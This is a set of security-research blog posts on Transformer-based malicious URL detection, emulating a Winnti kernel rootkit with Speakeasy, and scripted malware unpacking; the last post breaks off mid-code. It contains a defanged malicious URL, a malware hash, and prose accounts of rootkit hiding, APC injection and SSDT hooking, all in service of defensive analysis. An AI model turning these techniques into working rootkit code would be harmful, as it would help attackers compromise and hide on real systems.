hxxps://keystolivingafulfilledlife[.]com/wp-admin/includes/daspoe99i3mdef/DOCUNTRITING


Training Transformers for Cyber Security Tasks: A Case Study on Malicious URL Prediction

Threat Research

Ethan M. Rudd

21 January 2021 at 17:30

Highlights

Perform a case study on using Transformer models to solve cyber security problems
Train a Transformer model to detect malicious URLs under multiple training regimes
Compare our model against other deep learning methods, and show it performs on-par with other top-scoring models
Identify issues with applying generative pre-training to malicious URL detection, which is a cornerstone of Transformer training in natural language processing (NLP) tasks
Introduce a novel loss function that balances classification and generative loss to achieve improved performance on the malicious URL detection task

Introduction

Over the past three years Transformer machine learning (ML) models, or “Transformers” for short, have yielded impressive breakthroughs in a variety of sequence modeling problems, specifically natural language processing (NLP). For example, OpenAI’s latest GPT-3 model is capable of generating long segments of grammatically correct prose from scratch. Spinoff models, such as those developed for question answering, are capable of correlating context over multiple sentences. AI Dungeon, a single and multiplayer text adventure game, uses Transformers to generate plausible unlimited content in a variety of fantasy settings. Transformers’ NLP modeling capabilities are apparently so powerful that they pose security risks in their own right through their potential to spread disinformation. On the other side of the coin, they can be used as powerful tools to detect and mitigate disinformation campaigns. For example, in previous research by the FireEye Data Science team, an NLP Transformer was fine-tuned to detect disinformation on social media sites.

Given the power of these Transformer models, it seems natural to wonder if we can apply them to other types of cyber security problems that do not necessarily involve natural language, per se. In this blog post, we discuss a case study in which we apply Transformers to malicious URL detection. Studying Transformer performance on the URL detection problem is a logical first step to extending Transformers to more generic cyber security tasks, since URLs are not technically natural language sequences but share some common characteristics with NLP.

In the following sections, we outline a typical Transformer architecture and discuss how we adapt it to URLs with a character-focused tokenization. We then discuss loss functions we employ to guide the training of the model, and finally compare our training approaches to more conventional ML-based modeling options.

Adapting Transformers to URLs

Our URL Transformer operates at the character level, where each character in the URL corresponds to an input token. When a URL is input to our Transformer, it is appended with special tokens—a classification token (“CLS”) that conditions the model to produce a prediction and padding tokens (“PAD”) that normalize the input to a fixed length to allow for parallel training. Each token in the input string is then projected into a character embedding space, followed by a stack of Attention and Feed-Forward Neural Network (FFNN) layers. This stack of layers is similar to the architecture introduced in the original Transformers paper. At a high level, the Attention layers allow each input to be associated with long-distance context of other characters that are important for the classification task, similar to the notion of attention in humans, while the FFNN layers provide capacity for learning the relationships among the combination of inputs and their respective contexts. An illustration of our architecture is shown in Figure 1.
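As a rough illustration of the character-level tokenization described above, the following sketch maps a URL to integer token IDs, appends a CLS token, and pads the result to a fixed length. The vocabulary (printable ASCII), the token IDs, the max_len of 32, and the helper name tokenize_url are assumptions made for this example and are not the values used in the actual model.

```python
import string

# Hypothetical vocabulary: two special tokens followed by printable ASCII.
PAD, CLS = "<PAD>", "<CLS>"
VOCAB = [PAD, CLS] + list(string.printable)
TOKEN_TO_ID = {tok: idx for idx, tok in enumerate(VOCAB)}


def tokenize_url(url, max_len=32):
    """Map each character to an ID, append CLS, then pad to max_len."""
    # Leave room for the CLS token; longer URLs are truncated.
    chars = list(url[: max_len - 1])
    # Characters outside the vocabulary are dropped in this sketch.
    ids = [TOKEN_TO_ID[c] for c in chars if c in TOKEN_TO_ID]
    ids.append(TOKEN_TO_ID[CLS])
    ids += [TOKEN_TO_ID[PAD]] * (max_len - len(ids))
    return ids


tokens = tokenize_url("fireeye.com")
```

Placing CLS after the URL characters means that, under left-to-right masking, the CLS position can see the entire URL before producing a prediction.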

Additionally, the URL Transformer employs a masking strategy in its Attention calculation, which enforces a left-to-right (L-R) dependence. This means that only input characters from the left of a given character influence that character’s representation in each layer of the attention stack. The network outputs one embedding for each input character, which captures all information learned by the model about the character sequence up to that point in the input.
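The left-to-right dependence can be pictured as a lower-triangular mask over positions. The sketch below is a toy stand-in, not the model's attention code: it assumes each position may see itself and everything to its left, and it replaces the learned attention weights with a plain average so that the effect of the mask is easy to follow. The function names are hypothetical.

```python
def causal_mask(seq_len):
    """Return a seq_len x seq_len matrix where mask[i][j] is True if
    position i may attend to position j (that is, j <= i)."""
    return [[j <= i for j in range(seq_len)] for i in range(seq_len)]


def masked_average(values, mask_row):
    """Toy stand-in for attention: average only the visible positions."""
    visible = [v for v, keep in zip(values, mask_row) if keep]
    return sum(visible) / len(visible)


mask = causal_mask(4)
values = [1.0, 2.0, 3.0, 4.0]
# Each output depends only on values at or to the left of its position.
outputs = [masked_average(values, row) for row in mask]
```

Changing values[3] in this example alters only the last output, which mirrors how later characters cannot influence the representations of earlier ones.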

Once the model is trained, we can use the URL Transformer to perform several different tasks, such as generatively predicting the next character in the input sequence by using the sequence embedding as an input to another neural network with a softmax output over the possible vocabulary of characters. A specific example of this is shown in Figure 1, where we take the embedding of the input “firee” and use it to predict the next most likely character, “y.” Similarly, we can use the embedding produced after the classification token to predict other properties of the input sequences, such as their likelihood of maliciousness.

Figure 1: High-level overview of the URL Transformer architecture

Loss Functions and Training Regimes

With the model architecture in hand, we now turn to the question of how we train the model to most effectively detect malicious URLs. Of course, we can train this model in a similar way to other supervised deep learning classifiers by: (1) making predictions on samples from a labeled training set, (2) using a loss function to measure the quality of our predictions, and (3) tuning model parameters (i.e., weights) via backpropagation. However, the nature of the Transformer model allows for several interesting variations to this training regime. In fact, one of the reasons that Transformers have become so popular for NLP tasks is that they allow for self-supervised generative pre-training, which takes advantage of massive amounts of unlabeled data to help the model learn general characteristics of the input language before being fine-tuned on the ultimate task at hand (e.g., question answering, sentiment analysis, etc.). Here, we outline some of the training regimes we explored for our URL Transformer model.

Direct Label Prediction (Decode-To-Label)

Using a training set of URLs with malicious and benign labels, we can treat the URL Transformer architecture as a feature extractor, whose outputs we use as the input to a traditional classifier (e.g., FFNN or even a random forest). When using a FFNN as our classifier, we can backpropagate the classification loss (e.g., binary cross-entropy) through both the classifier and the Transformer network to adjust the weights to perform classification. This training regime is the baseline for our experiments and is how most deep learning models are trained for classification tasks.

Next-Character Prediction Pre-Training and Fine-Tuning

Beyond the baseline classification training regime, the NLP literature suggests that one can learn a self-supervised embedding of the input sequence by training the Transformer to perform a next-character prediction task, then fine-tuning the learned representation for the classification problem. A key advantage of this approach is that data used for pre-training does not require malicious or benign labels; instead, the next characters in a URL serve as the labels to be predicted from prior characters in the sequence. This is similar to the example given in Figure 1, where the embedding output is used to predict the next character, “y,” in “fireeye.com.” Overall, this training regime allows us to take advantage of the massive amount of unlabeled data that is typically available in cyber security-related problems.

The overall structure of the architecture for this regime is similar to the aforementioned binary classification task, with FFNN layers added for classification. However, since we are now predicting multiple classes (i.e., one class per input character in the vocabulary), we must apply a softmax function to the output to induce a probability distribution over the potential output characters. Once the Transformer portion of the network is pre-trained in this way, we can swap the FFNN classification layers focused on character prediction with new layers that will be trained for the malicious URL classification problem, as in the decode-to-label case.

Balanced Mixed-Objective Training

Prior work has shown that imbuing the training process with additional knowledge outside of the primary task can help constrain the learning process, and ultimately result in better models. For instance, a malware classifier might train using loss functions that capture malicious/benign classification, malware family prediction, and tag prediction tasks as a mechanism to provide the classifier with broader understanding of the problem than looking at malicious/benign labels in isolation.

Inspired by these findings, we also introduced a mixed-objective training regime for our URL Transformer, where we train for binary classification and next-character prediction simultaneously. At each iteration of training, we compute a loss multiplier such that each loss contribution is fixed prior to backpropagation. This ensures that neither loss term dominates during training. Specifically, for minibatch i, the net loss LMixed is a weighted combination of the classification loss LCLS and the next-character prediction loss LNext.

Given hyperparameters a and b, defined such that a + b := 1, we compute constant loss multipliers so that the net loss contribution of LCLS to LMixed is a and the net contribution of LNext to LMixed is b. For our evaluations, we set a := b := 0.5, effectively requiring that the model equally balance its ability to generate the next character and accurately predict malicious URLs.
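One possible way to realize this kind of balancing is sketched below. It is an assumption made for illustration and not necessarily the exact formula from the white paper: the multipliers alpha and beta are recomputed for every minibatch from the current loss values so that the weighted LCLS term makes up a fraction a of the mixed loss and the weighted LNext term makes up a fraction b. The function name, the eps guard, and the example loss values are hypothetical.

```python
def balanced_mixed_loss(loss_cls, loss_next, a=0.5, b=0.5, eps=1e-12):
    """Combine two losses so that they contribute fractions a and b
    of the mixed loss, regardless of their raw magnitudes."""
    if abs(a + b - 1.0) > 1e-9:
        raise ValueError("a and b must sum to 1")
    total = loss_cls + loss_next
    # Multipliers are treated as constants for the current minibatch; in an
    # autodiff framework they would be computed without tracking gradients.
    alpha = a * total / (loss_cls + eps)
    beta = b * total / (loss_next + eps)
    mixed = alpha * loss_cls + beta * loss_next
    return mixed, alpha, beta


# Example values chosen only to show a large gap in raw magnitudes.
mixed, alpha, beta = balanced_mixed_loss(loss_cls=0.2, loss_next=3.0)
```

With a = b = 0.5, both weighted terms end up equal even though the raw next-character loss is fifteen times larger than the classification loss in this example.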

Evaluation

To evaluate our URL Transformer model and better understand the impact of the three training regimes discussed earlier, we collected a training dataset of over 1M labeled malicious and benign URLs, which was split into roughly 700K training samples, 100K validation samples, and 200K test samples. We also developed an unlabeled pre-training dataset of 20M URLs.

Using this data, we performed four different training runs for our Transformer model:

DecodeToLabel (Baseline): Using strictly the binary cross-entropy loss on the embedded classification features over the entire sequence, we trained the model for 15 epochs using the training set.
MixedObjective: We trained the model for 15 epochs on the training set, using both the embedded classification features and the embedded next-character prediction features.
FineTune: We pre-trained the model for 15 epochs on the next-character prediction task using the training set, ignoring the malicious/benign labels. We then froze weights over the first 16 layers of the model and trained the model for an additional 15 epochs using a binary cross-entropy loss on the classification labels.
FineTune 20M: We performed pre-training on the next-character prediction task using the 20M URL dataset, pre-training for 2 epochs. We then froze weights over the first 16 layers of the Transformer and trained for 15 epochs on the binary classification task.

The ROC curve shown in Figure 2 compares the performance of these four training regimes. Here, our baseline DecodeToLabel model (red) yielded a ROC curve with 0.9484 AUC, while the MixedObjective model (green) slightly outperformed the baseline with an AUC of 0.956. Interestingly, both of the fine-tuning models yielded poor classification results, which is counter to the established practice of these Transformer models in the NLP domain.

Figure 2: ROC curves for four URL Transformer training regimes

To assess the relative efficacy of our Transformer models on this dataset, we also fit several other types of benchmark models developed for URL classification: (1) a Random Forest model on SME-derived features, (2) a 1D Convolutional Neural Network (CNN) model on character embeddings, and (3) a Long Short-Term Memory (LSTM) neural network on character embeddings. Details of these models can be found in our white paper. We find that our top-performing Transformer model performs on par with the best-performing non-Transformer baseline (a 1D CNN model), which perhaps indicates that the long-range dependencies typically learned by Transformer models are not as useful in the case of malicious URL detection.

Figure 3: ROC curves comparing URL Transformer to other benchmark URL classification models

Summary

Our experiments suggest that Transformers can achieve performance comparable to or better than that of other top-performing models for URL classification, though the details of how to achieve that performance differ from common practice. Contrary to findings from the NLP domain, wherein self-supervised pre-training substantially enhances performance in a fine-tuned classification task, similar pre-training approaches actually diminish performance for malicious URL detection. This suggests that the next-character prediction task has too little apparent correlation with the task of malicious/benign prediction for effective and stable transfer.

Interestingly, utilizing next-character prediction as an auxiliary loss function in conjunction with a malicious/benign loss yields improvements over training solely to predict the label. We hypothesize that while pre-training leads to a relatively poor generative model due to randomized content in the URLs within our dataset, a malicious/benign loss may serve to better condition the generative model learned by the next-character prediction task, distilling a subset of relevant information. It may also be the case that the long-distance relationships that are key to the generative pre-training task are not as important for the final malicious URL classification, as evidenced by the performance of the 1D CNN model.

Note that we did not perform a rigorous hyperparameter search for our Transformer, since this research was primarily concerned with loss functions and training regimes. Therefore, it is still an open question as to whether a more optimal architecture, specifically designed for this classification task, could substantially outperform the models described here.

While our URL dataset is not representative of all data in the cyber security space, the difficulty of obtaining a readily fine-tuned model from self-supervised pre-training suggests that this approach is unlikely to work well for training Transformers on longer sequences or sequences with lesser resemblance to natural language (e.g., PE files), but an auxiliary loss might work.

Details about this research and additional results can be found in our associated white paper.

Emulation of Kernel Mode Rootkits With Speakeasy

Threat Research

Andrew Davis

20 January 2021 at 16:45

In August 2020, we released a blog post about how the Speakeasy emulation framework can be used to emulate user mode malware such as shellcode. If you haven’t had a chance, give the post a read today.

In addition to user mode emulation, Speakeasy also supports emulation of kernel mode Windows binaries. When malware authors employ kernel mode malware, it will often be in the form of a device driver whose end goal is total compromise of an infected system. The malware most often doesn’t interact with hardware and instead leverages kernel mode to fully compromise the system and remain hidden.

Challenges With Dynamically Analyzing Kernel Malware

Ideally, a kernel mode sample can be reversed statically using tools such as disassemblers. However, binary packers just as easily obfuscate kernel malware as they do user mode samples. Additionally, static analysis is often expensive and time consuming. If our goal is to automatically analyze many variants of the same malware family, it makes sense to dynamically analyze malicious driver samples.

Dynamic analysis of kernel mode malware can be more involved than with user mode samples. In order to debug kernel malware, a proper environment needs to be created. This usually involves setting up two separate virtual machines as debugger and debuggee. The malware can then be loaded as an on-demand kernel service where the driver can be debugged remotely with a tool such as WinDbg.

Several sandbox style applications exist that use hooking or other monitoring techniques but typically target user mode applications. Having similar sandbox monitoring work for kernel mode code would require deep system level hooks that would likely produce significant noise.

Driver Emulation

Emulation has proven to be an effective analysis technique for malicious drivers. No custom setup is required, and drivers can be emulated at scale. In addition, maximum code coverage is easier to achieve than in a sandbox environment. Often, rootkits may expose malicious functionality via I/O request packet (IRP) handlers (or other callbacks). On a normal Windows system these routines are executed when other applications or devices send input/output requests to the driver. This includes common tasks such as reading, writing, or sending device I/O control (IOCTLs) to a driver to execute some type of functionality.

Using emulation, these entry points can be called directly with doped IRPs in order to identify as much functionality as possible in the rootkit. As we discussed in the first Speakeasy blog post, additional entry points are emulated as they are discovered. A driver’s DriverEntry function is responsible for initializing a function dispatch table that is called to handle I/O requests. Speakeasy will attempt to emulate each of these functions after the main entry point has completed by supplying a dummy IRP. Additionally, any system threads or work items that are created are sequentially emulated in order to get as much code coverage as possible.

Emulating a Kernel Mode Implant

In this blog post, we will show an example of Speakeasy’s effectiveness at emulating a real kernel mode implant family publicly named Winnti. This sample was chosen despite its age because it transparently implements some classic rootkit functionality. The goal of this post is not to discuss the analysis of the malware itself as it is fairly antiquated. Rather, we will focus on the events that are captured during emulation.

The Winnti sample we will be analyzing has SHA256 hash c465238c9da9c5ea5994fe9faf1b5835767210132db0ce9a79cb1195851a36fb and the original file name tcprelay.sys. For most of this post, we will be examining the emulation report generated by Speakeasy. Note: many techniques employed by this 32-bit rootkit will not work on modern 64-bit versions of Windows due to Kernel Patch Protection (PatchGuard) which protects against modification of critical kernel data structures.

To start, we will instruct Speakeasy to emulate the kernel driver using the command line shown in Figure 1. We instruct Speakeasy to create a full memory dump (using the “-d” flag) so we can acquire memory later. We supply the memory tracing flag (“-m”) which will log all memory reads and writes performed by the malware. This is useful for detecting things like hooking and direct kernel object manipulation (DKOM).

Figure 1: Command line used to emulate the malicious driver

Speakeasy will then begin emulating the malware’s DriverEntry function. The entry point of a driver is responsible for setting up passive callback routines that will service user mode I/O requests as well as callbacks used for device addition, removal, and unloading. Reviewing the emulation report for the malware’s DriverEntry function (identified in the JSON report with an “ep_type” of “entry_point”), shows that the malware finds the base address of the Windows kernel. The malware does this by using the ZwQuerySystemInformation API to locate the base address for all kernel modules and then looking for one named “ntoskrnl.exe”. The malware then manually finds the address of the PsCreateSystemThread API. This is then used to spin up a system thread to perform its actual functionality. Figure 2 shows the APIs called from the malware's entry point.

Figure 2: Key functionality in the tcprelay.sys entry point
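A report like this lends itself to scripted triage. The sketch below groups logged API names by entry point type. Only the “ep_type” field name is taken from this post; the “entry_points”, “apis”, and “api_name” keys are assumptions about the report layout, and the embedded report is a hand-written stand-in rather than actual Speakeasy output.

```python
import json

# Hand-written stand-in for a report; not actual Speakeasy output.
SAMPLE_REPORT = json.loads("""
{
  "entry_points": [
    {"ep_type": "entry_point",
     "apis": [{"api_name": "ZwQuerySystemInformation"},
              {"api_name": "PsCreateSystemThread"}]},
    {"ep_type": "system_thread",
     "apis": [{"api_name": "KeInitializeApc"}]}
  ]
}
""")


def apis_by_entry_point(report):
    """Return {ep_type: [api names in call order]} for each entry point."""
    summary = {}
    for ep in report.get("entry_points", []):
        names = [call.get("api_name", "?") for call in ep.get("apis", [])]
        summary.setdefault(ep.get("ep_type", "unknown"), []).extend(names)
    return summary


summary = apis_by_entry_point(SAMPLE_REPORT)
```

For a real report, the stand-in would be replaced with the JSON file written by Speakeasy, after checking the key names against the report format of the installed version.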

Hiding the Driver Object

The malware attempts to hide itself before executing its main system thread. The malware first looks up the “DriverSection” field in its own DRIVER_OBJECT structure. This field points to the driver’s entry in a doubly linked list of all loaded kernel modules, and the malware attempts to unlink its entry to hide from APIs that list loaded drivers. In the “mem_access” field in the Speakeasy report shown in Figure 3, we can see two memory writes, one to the list entry before the malware’s own entry and one to the entry after it, which together remove the malware from the linked list.

Figure 3: Memory write events representing the tcprelay.sys malware attempting to unlink itself in order to hide
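To see why unlinking shows up as exactly two memory writes, consider the following simplified model of a circular doubly linked list. It is a plain Python simulation written for illustration, not Windows or Speakeasy code; the class and function names are hypothetical, and the module names are placeholders.

```python
class ListEntry:
    """Minimal stand-in for a LIST_ENTRY node with forward/back links."""

    def __init__(self, name):
        self.name = name
        self.flink = self  # next entry
        self.blink = self  # previous entry


def insert_tail(head, entry):
    """Insert entry just before head in a circular doubly linked list."""
    entry.flink, entry.blink = head, head.blink
    head.blink.flink = entry
    head.blink = entry


def unlink(entry):
    """Remove entry with exactly two writes to its neighbours."""
    entry.blink.flink = entry.flink  # write 1: previous entry skips us
    entry.flink.blink = entry.blink  # write 2: next entry skips us


def walk(head):
    """List module names by following forward links from head."""
    names, cur = [], head.flink
    while cur is not head:
        names.append(cur.name)
        cur = cur.flink
    return names


head = ListEntry("<head>")
modules = {n: ListEntry(n) for n in
           ("ntoskrnl.exe", "tcpip.sys", "tcprelay.sys", "netio.sys")}
for entry in modules.values():
    insert_tail(head, entry)

before = walk(head)
unlink(modules["tcprelay.sys"])
after = walk(head)
```

After the two writes, any code that walks the list from the head no longer encounters the unlinked entry, even though the entry itself still exists in memory.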

As noted in the original Speakeasy blog post, when threads or other dynamic entry points are created at runtime, the framework will follow them for emulation. In this case, the malware created a system thread and Speakeasy automatically emulated it.

Moving on to the newly created thread (identified by an “ep_type” of “system_thread”), we can see the malware begin its real functionality. The malware begins by enumerating all running processes on the host, looking for the service controller process named services.exe. It's important to note that the process listing that gets returned to the emulated samples is configurable via JSON config files supplied at runtime. For more information on these configuration options please see the Speakeasy README on our GitHub repository. An example of this configurable process listing is shown in Figure 4.

Figure 4: Process listing configuration field supplied to Speakeasy

Pivoting to User Mode

Once the malware locates the services.exe process, it will attach to its process context and begin inspecting user mode memory in order to locate the addresses of exported user mode functions. The malware does this so it can later inject an encoded, memory-resident DLL into the services.exe process. Figure 5 shows the APIs used by the rootkit to resolve its user mode exports.

Figure 5: Logged APIs used by tcprelay.sys rootkit to resolve exports for its user mode implant

Once the exported functions are resolved, the rootkit is ready to inject the user mode DLL component. Next, the malware manually copies the in-memory DLL into the services.exe process address space. These memory write events are captured and shown in Figure 6.

Figure 6: Memory write events captured while copying the user mode implant into services.exe

A common technique that rootkits use to execute user mode code involves a Windows feature known as Asynchronous Procedure Calls (APC). APCs are functions that execute asynchronously within the context of a supplied thread. Using APCs allows kernel mode applications to queue code to run within a thread’s user mode context. Malware often wants to inject into user mode since much of the common functionality (such as network communication) within Windows can be more easily accessed there. In addition, code running in user mode carries less risk of detection, because a bug in it will not bug-check the entire machine.

In order to queue an APC to fire in user mode, the malware must locate a thread in an “alertable” state. Threads are said to be alertable when they relinquish their execution quantum to the kernel thread scheduler and notify the kernel that they are able to dispatch APCs. The malware searches for threads within the services.exe process and once it detects one that’s alertable it will allocate memory for the DLL to inject then queue an APC to execute it.

Speakeasy emulates all kernel structures involved in this process, specifically the executive thread object (ETHREAD) structures that are allocated for every thread on a Windows system. Malware may attempt to grovel through this opaque structure to identify when a thread’s alertable flag is set (and therefore a valid candidate for an APC). Figure 7 shows the memory read event that was logged when the Winnti malware manually parsed an ETHREAD structure in the services.exe process to confirm it was alertable. At the time of this writing, all threads within the emulator present themselves as alertable by default.

Figure 7: Event logged when the tcprelay.sys malware confirmed a thread was alertable

Next, the malware can execute any user mode code it wants using this thread object. The undocumented functions KeInitializeApc and KeInsertQueueApc will initialize and execute a user mode APC respectively. Figure 8 shows the API set that the malware uses to inject a user mode module into the services.exe process. The malware executes a shellcode stub as the target of the APC that will then execute a loader for the injected DLL. All of this can be recovered from the memory dump package and analyzed later.

Figure 8: Logged APIs used by tcprelay.sys rootkit to inject into user mode via an APC

Network Hooks

After injecting into user mode, the kernel component will attempt to install network obfuscation hooks (presumably to hide the user mode implant). Speakeasy tracks and tags all memory within the emulation space. In the context of kernel mode emulation, this includes all kernel objects (e.g. Driver and Device objects, and the kernel modules themselves). Immediately after we observe the malware inject its user mode implant, we see it begin to attempt to hook kernel components. This was confirmed during static analysis to be used for network hiding.

The memory access section of the emulation report reveals that the malware modified the netio.sys driver, specifically code within the exported function named NsiEnumerateObjectsAllParametersEx. This function is ultimately called when a user on the system runs the “netstat” command and it is likely that the malware is hooking this function in order to hide connected network ports on the infected system. This inline hook was identified by the event captured in Figure 9.

Figure 9: Inline function hook set by the malware to hide network connections

In addition, the malware hooks the Tcpip driver object in order to accomplish additional network hiding. Specifically, the malware hooks the IRP_MJ_DEVICE_CONTROL handler for the Tcpip driver. User mode code may send IOCTL codes to this function when querying for active connections. This type of hook can be easily identified with Speakeasy by looking for memory writes to critical kernel objects as shown in Figure 10.

Figure 10: Memory write event used to hook the Tcpip network driver

System Service Dispatch Table Hooks

Finally, the rootkit will attempt to hide itself using the nearly ancient technique of system service dispatch table (SSDT) patching. Speakeasy allocates a fake SSDT so malware can interact with it. The SSDT is a function table that exposes kernel functionality to user mode code. The event in Figure 11 shows that the SSDT structure was modified at runtime.

Figure 11: SSDT hook detected by Speakeasy
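Speakeasy flags this hook by observing the write to the table. A complementary, generic heuristic that analysts often apply to a captured table is to check whether each handler address still falls inside the kernel image. The sketch below illustrates that heuristic only; it is not how Speakeasy detects the hook, and the addresses, sizes, and function name are hypothetical.

```python
def find_ssdt_hooks(ssdt, kernel_base, kernel_size):
    """Return (index, target) pairs whose handler lies outside the kernel image."""
    kernel_end = kernel_base + kernel_size
    return [
        (index, target)
        for index, target in enumerate(ssdt)
        if not kernel_base <= target < kernel_end
    ]


# Hypothetical addresses chosen only for this example.
KERNEL_BASE, KERNEL_SIZE = 0x80400000, 0x200000
ssdt = [0x80412340, 0x80456780, 0xF7A01000, 0x804ABCD0]

hooks = find_ssdt_hooks(ssdt, KERNEL_BASE, KERNEL_SIZE)
```

In this example the third entry points outside the kernel image and would be reported as a likely hook.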

If we look at the malware in IDA Pro, we can confirm that the malware patches the SSDT entries for the ZwQueryDirectoryFile and ZwEnumerateKey APIs, which it uses to hide itself from file system and registry analysis. The SSDT patch function is shown in Figure 12.

Figure 12: File hiding SSDT patching function shown in IDA Pro

After setting up these hooks, the system thread will exit. The other entry points (such as the IRP handlers and DriverUnload routines) in the driver are less interesting and contain mostly boilerplate driver code.

Acquiring the Injected User Mode Implant

Now that we have a good idea what the driver does to hide itself on the system, we can use the memory dumps created by Speakeasy to acquire the injected DLL discussed earlier. Opening the zip file we created at emulation time, we can find the memory tag referenced in Figure 6. We quickly confirm the memory block has a valid PE header and it successfully loads into IDA Pro as shown in Figure 13.

Figure 13: Injected user mode DLL recovered from Speakeasy memory dump
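The quick PE header check mentioned above can also be scripted when many dumped memory blocks need to be triaged. The following sketch tests for the MZ magic and follows the e_lfanew field at offset 0x3C to the PE signature. The helper name looks_like_pe is hypothetical, and the buffer is synthetic; a real memory block would be read from the dump archive instead.

```python
import struct


def looks_like_pe(data):
    """Return True if data starts with an MZ header that points to a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    # e_lfanew: 32-bit little-endian offset of the PE header, stored at 0x3C.
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


# Synthetic buffer built for this example; a real dump would be read from disk.
fake = bytearray(0x100)
fake[0:2] = b"MZ"
struct.pack_into("<I", fake, 0x3C, 0x80)
fake[0x80:0x84] = b"PE\x00\x00"

is_pe = looks_like_pe(bytes(fake))
is_not_pe = looks_like_pe(b"\x00" * 0x100)
```

This check only confirms that the header signatures are present; it does not validate sections or imports, so loading the block in a disassembler remains the real confirmation.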

Conclusion

In this blog post, we discussed how Speakeasy can be effective at automatically identifying rootkit activity from the kernel mode binary. Speakeasy can be used to quickly triage kernel binaries that may otherwise be difficult to dynamically analyze. For more information and to check out the code, head over to our GitHub repository.

Using Speakeasy Emulation Framework Programmatically to Unpack Malware

Threat Research

James T. Bennett

1 December 2020 at 20:30

Andrew Davis recently announced the public release of his new Windows emulation framework named Speakeasy. While the introductory blog post focused on using Speakeasy as an automated malware sandbox of sorts, this entry will highlight another powerful use of the framework: automated malware unpacking. I will demonstrate, with code examples, how Speakeasy can be used programmatically to:

Bypass unsupported Windows APIs to continue emulation and unpacking
Save virtual addresses of dynamically allocated code using API hooks
Surgically direct execution to key areas of code using code hooks
Dump an unpacked PE from emulator memory and fix its section headers
Aid in reconstruction of import tables by querying Speakeasy for symbolic information

Initial Setup

One approach to interfacing with Speakeasy is to create a subclass of Speakeasy’s Speakeasy class. Figure 1 shows a Python code snippet that sets up such a class that will be expanded in upcoming examples.

import speakeasy

class MyUnpacker(speakeasy.Speakeasy):
    def __init__(self, config=None):
        super(MyUnpacker, self).__init__(config=config)

Figure 1: Creating a Speakeasy subclass

The code in Figure 1 accepts a Speakeasy configuration dictionary that may be used to override the default configuration. Speakeasy ships with several configuration files. The Speakeasy class is a wrapper class for an underlying emulator class. The emulator class is chosen automatically when a binary is loaded based on its PE headers or is specified as shellcode. Subclassing Speakeasy makes it easy to access, extend, or modify interfaces. It also facilitates reading and writing stateful data before, during, and after emulation.

Emulating a Binary

Figure 2 shows how to load a binary into the Speakeasy emulator.

self.module = self.load_module(filename)

Figure 2: Loading the binary into the emulator

The load_module function returns a PeFile object for the provided binary on disk. It is an instance of the PeFile class defined in speakeasy/windows/common.py, which is subclassed from pefile’s PE class. Alternatively, you can provide the bytes of a binary using the data parameter rather than specifying a file name. Figure 3 shows how to emulate a loaded binary.

self.run_module(self.module)

Figure 3: Starting emulation

API Hooks

The Speakeasy framework ships with support for hundreds of Windows APIs with more being added frequently. This is accomplished via Python API handlers defined in appropriate files in the speakeasy/winenv/api directory. API hooks can be installed to have your own code executed when particular APIs are called during emulation. They can be installed for any API, regardless of whether a handler exists or not. An API hook can be used to override an existing handler and that handler can optionally be invoked from your hook. The API hooking mechanism in Speakeasy provides flexibility and control over emulation. Let’s examine a few uses of API hooking within the context of emulating unpacking code to retrieve an unpacked payload.

Bypassing Unsupported APIs

When Speakeasy encounters an unsupported Windows API call, it stops emulation and provides the name of the API function that is not supported. If the API function in question is not critical for unpacking the binary, you can add an API hook that simply returns a value that allows execution to continue. For example, a recent sample’s unpacking code contained API calls that had no effect on the unpacking process. One such API call was to GetSysColor. In order to bypass this call and allow execution to continue, an API hook may be added as shown in Figure 4.

self.add_api_hook(self.getsyscolor_hook,
                  'user32',
                  'GetSysColor',
                  argc=1
                  )

Figure 4: Adding an API hook

According to MSDN, this function takes 1 parameter and returns an RGB color value represented as a DWORD. If the calling convention for the API function you are hooking is not stdcall, you can specify the calling convention in the optional call_conv parameter. The calling convention constants are defined in the speakeasy/common/arch.py file. Because the GetSysColor return value does not impact the unpacking process, we can simply return 0. Figure 5 shows the definition of the getsyscolor_hook function specified in Figure 4.

def getsyscolor_hook(self, emu, api_name, func, params):
    return 0

Figure 5: The GetSysColor hook returns 0

If an API function requires more finessed handling, you can implement a more specific and meaningful hook that suits your needs. If your hook implementation is robust enough, you might consider contributing it to the Speakeasy project as an API handler!

Adding an API Handler

Within the speakeasy/winenv/api directory you'll find usermode and kernelmode subdirectories that contain Python files for corresponding binary modules. These files contain the API handlers for each module. In usermode/kernel32.py, we see a handler defined for SetEnvironmentVariable as shown in Figure 6.

1: @apihook('SetEnvironmentVariable', argc=2)
2: def SetEnvironmentVariable(self, emu, argv, ctx={}):
3:     '''
4:     BOOL SetEnvironmentVariable(
5:         LPCTSTR lpName,
6:         LPCTSTR lpValue
7:         );
8:     '''
9:     lpName, lpValue = argv
10:    cw = self.get_char_width(ctx)
11:    if lpName and lpValue:
12:        name = self.read_mem_string(lpName, cw)
13:        val = self.read_mem_string(lpValue, cw)
14:        argv[0] = name
15:        argv[1] = val
16:        emu.set_env(name, val)
17:    return True

Figure 6: API handler for SetEnvironmentVariable

A handler begins with a function decorator (line 1) that defines the name of the API and the number of parameters it accepts. At the start of a handler, it is good practice to include MSDN's documented prototype as a comment (lines 3-8).

The handler's code begins by storing elements of the argv parameter in variables named after their corresponding API parameters (line 9). The handler's ctx parameter is a dictionary that contains contextual information about the API call. For API functions that end in an ‘A’ or ‘W’ (e.g., CreateFileA), the character width can be retrieved by passing the ctx parameter to the get_char_width function (line 10). This width value can then be passed to calls such as read_mem_string (lines 12 and 13), which reads the emulator’s memory at a given address and returns a string.
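To make the role of the character width concrete, the sketch below reads a null-terminated string from a byte buffer using a width of 1 (ANSI) or 2 (wide). It is a standalone illustration and not Speakeasy's implementation of get_char_width or read_mem_string; the helper names read_string and char_width_for, the suffix-based width guess, and the sample buffer are assumptions.

```python
def read_string(memory, address, char_width):
    """Read a null-terminated string from a bytes-like buffer.

    char_width is 1 for ANSI ('A') APIs and 2 for wide ('W') APIs.
    """
    if char_width not in (1, 2):
        raise ValueError("char_width must be 1 or 2")
    terminator = b"\x00" * char_width
    end = address
    # Step one character at a time so a wide terminator stays aligned.
    while (end + char_width <= len(memory)
           and memory[end:end + char_width] != terminator):
        end += char_width
    raw = bytes(memory[address:end])
    return raw.decode("utf-16-le" if char_width == 2 else "latin-1")


def char_width_for(api_name):
    """Guess the width from the API suffix; default to 1 otherwise."""
    return 2 if api_name.endswith("W") else 1


# Sample buffer: 4 filler bytes, an ANSI string, then a wide string.
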